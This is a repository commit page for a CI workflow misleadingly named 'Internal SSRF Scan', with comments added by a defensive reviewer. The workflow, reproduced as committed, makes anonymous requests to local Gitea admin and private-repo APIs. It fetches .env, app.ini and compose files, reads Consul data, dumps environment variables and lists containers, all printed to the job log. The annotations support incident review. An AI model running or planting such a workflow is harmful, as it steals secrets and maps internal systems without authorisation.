secdev99 73a271d549
Some checks failed
Internal SSRF Scan / ssrf-scan (push) Has been cancelled
add internal scan workflow
2026-07-04 13:23:50 +00:00

59 lines
2.7 KiB
YAML

# Reviewer annotation (defensive). This workflow is reconnaissance run from a
# CI job: it queries loopback services and prints the results to the job log.
# Despite the name, no server-side fetcher is involved; the job itself sends
# every request from wherever the runner executes it.
# The commands are kept exactly as committed; only the indentation (lost in the
# page listing) is restored and comments are added.
# What to check when this shows up in a repository:
#   - who may push workflow files, and whether runs need approval first;
#   - whether the runner shares a network namespace, Docker socket or
#     environment with the forge host or other services;
#   - the job log for this commit (the page header lists the run as
#     cancelled; confirm how far the step got). Rotate anything it printed.
name: Internal SSRF Scan
# Runs on every push, with no branch or path filter.
on: [push]
jobs:
  ssrf-scan:
    # What "localhost" reaches depends on how the runner maps this label
    # (isolated container vs. host network) - confirm in the runner config.
    runs-on: ubuntu-latest
    steps:
      - name: Probe Internal Services
        # Every curl uses -s and 2>/dev/null, so a failed probe leaves an empty
        # section in the log instead of an error. Output is capped by head -c.
        # No curl sends a token or Authorization header.
        run: |
          # Forge API on localhost:3000, anonymous. The admin and private-repo
          # queries should be rejected or return public data only; a populated
          # response here points to an authentication gap - verify.
          echo "=== GITEA ADMIN USERS ==="
          curl -s http://localhost:3000/api/v1/admin/users 2>/dev/null | head -c 5000
          echo ""
          echo "=== GITEA ALL REPOS ==="
          curl -s "http://localhost:3000/api/v1/repos/search?limit=50&private=true" 2>/dev/null | head -c 5000
          echo ""
          # File listings and raw files from repos under the twmonogps owner.
          # .env, app.ini and docker-compose.yml commonly hold credentials;
          # they are only readable here if the repos allow anonymous access.
          echo "=== DEPLOY REPO TREE ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
          echo ""
          echo "=== CONFIG REPO .env ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/.env" 2>/dev/null | head -c 5000
          echo ""
          echo "=== BACKEND REPO TREE ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/backend/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
          echo ""
          echo "=== ORACLE REPO TREE ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/oracle/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
          echo ""
          echo "=== BRIDGE REPO TREE ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/bridge/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
          echo ""
          # Lists containers only if the job can reach a Docker daemon, which
          # an untrusted job should not be able to do.
          echo "=== DOCKER PS ==="
          docker ps 2>/dev/null || echo "no docker"
          echo ""
          # Redis does not speak HTTP; a reply only shows the port answers.
          # The "no redis" fallback keys off head's exit status, not curl's
          # (unless the shell sets pipefail), so its absence proves nothing.
          echo "=== REDIS INFO ==="
          curl -s http://localhost:6379/ 2>/dev/null | head -c 1000 || echo "no redis"
          echo ""
          # Prints the job's full environment to the log. Treat any token or
          # secret exposed to this job as disclosed to everyone who can read
          # the log; log masking may not cover every value - verify.
          echo "=== ENV VARS ==="
          env | sort
          echo ""
          # Interface and address inventory of the runner's network namespace.
          echo "=== NETWORK ==="
          ip addr 2>/dev/null || ifconfig 2>/dev/null
          echo ""
          # Recursive read of the Consul KV store; returns data only when the
          # agent answers anonymous requests (ACLs absent or permissive).
          echo "=== CONSUL ==="
          curl -s http://localhost:8500/v1/kv/?recurse 2>/dev/null | head -c 5000
          echo ""
          echo "=== DEPLOY COMPOSE ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/raw/main/docker-compose.yml" 2>/dev/null | head -c 5000
          echo ""
          echo "=== ROCKETSWAP REPO ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/rocketswap/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
          echo ""
          # PostgreSQL does not speak HTTP either; same pipeline-status caveat
          # as the Redis probe applies to the "no pg http" fallback.
          echo "=== POSTGRES ==="
          curl -s http://localhost:5432/ 2>/dev/null | head -c 500 || echo "no pg http"
          echo ""
          # Root endpoint on 9200; a response means the service on that port
          # accepts unauthenticated requests from the runner.
          echo "=== ES ==="
          curl -s http://localhost:9200/ 2>/dev/null | head -c 2000
          echo ""
          echo "=== GITEA APP INI ==="
          curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/app.ini" 2>/dev/null | head -c 5000